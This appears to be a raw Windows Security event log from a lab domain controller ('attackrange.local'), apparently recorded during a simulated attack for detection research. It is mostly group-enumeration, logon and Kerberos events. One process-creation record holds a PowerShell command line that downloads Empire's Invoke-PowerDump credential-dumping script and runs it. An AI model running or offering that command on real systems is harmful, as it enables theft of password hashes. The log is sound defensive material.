	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257991
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257990
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257989
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257988
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257987
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257986
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257985
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257984
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257983
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257982
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257981
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257980
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257979
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257978
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257977
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257976
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257975
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257974
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257973
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257972
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257971
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257970
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:16 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257969
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:20 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258045
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x294
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x13a4
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\""
Import-Module .\PowerDump.ps1
Invoke-PowerDump} 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:21 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258049
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x13c0
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1184
	Creator Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Process Command Line:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBBED.tmp" "c:\Users\Administrator\AppData\Local\Temp\00lezr2s\CSCB44602F1346B4F50A7D26D357FDA0AD.TMP"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:21 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258048
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1184
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x294
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\00lezr2s\00lezr2s.cmdline"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:21 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258047
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1228
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1010
	Creator Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Process Command Line:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBB51.tmp" "c:\Users\Administrator\AppData\Local\Temp\yvcl0vs4\CSC7A01F9535D7438DB3B21424DB1EB5A3.TMP"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:21 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258046
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1010
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x294
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\yvcl0vs4\yvcl0vs4.cmdline"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258068
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x5703C0

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258067
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258066
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55ED3E

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258065
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x5703C0

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258064
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x5703C0
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{94F5FBEF-489D-AAF9-3BB5-270620D7B5A2}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258063
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{94F5FBEF-489D-AAF9-3BB5-270620D7B5A2}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258062
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{94F5FBEF-489D-AAF9-3BB5-270620D7B5A2}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
